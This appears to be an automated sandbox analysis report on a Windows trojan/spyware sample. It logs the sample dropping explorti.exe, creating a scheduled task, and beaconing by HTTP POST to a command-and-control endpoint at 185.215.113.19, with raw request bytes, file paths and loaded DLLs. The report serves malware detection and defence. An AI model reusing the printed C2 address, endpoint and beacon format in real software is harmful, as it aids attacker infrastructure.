Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F

Source: Joe Sandbox View

IP Address: 185.215.113.19 185.215.113.19

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0071BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

7_2_0071BD60

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php#f
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0x
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php3M
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpC:
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpPy;
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpWindows
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpeb8a7
Source: explorti.exe, 00000007.00000002.2891529475.000000000122A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpk
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpm32
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpmM
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpoft
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpon
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpuM
Source: explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpx
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpyM

System Summary

PE file contains section with special chars

Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: f3wrBtIYXx.exe	Static PE information: section name: .idata
Source: f3wrBtIYXx.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Windows\Tasks\explorti.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00753068	7_2_00753068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0071E440	7_2_0071E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00714CF0	7_2_00714CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00747D83	7_2_00747D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0075765B	7_2_0075765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00714AF0	7_2_00714AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0075777B	7_2_0075777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00758720	7_2_00758720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00756F09	7_2_00756F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00752BD0	7_2_00752BD0

Source: f3wrBtIYXx.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f3wrBtIYXx.exe	Static PE information: Section: ZLIB complexity 1.0
Source: f3wrBtIYXx.exe	Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 1.0
Source: explorti.exe.0.dr	Static PE information: Section: bzkmssua ZLIB complexity 0.9941347082323538

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7

Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: f3wrBtIYXx.exe

Virustotal: Detection: 54%

Source: f3wrBtIYXx.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File read: C:\Users\user\Desktop\f3wrBtIYXx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\f3wrBtIYXx.exe "C:\Users\user\Desktop\f3wrBtIYXx.exe"
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

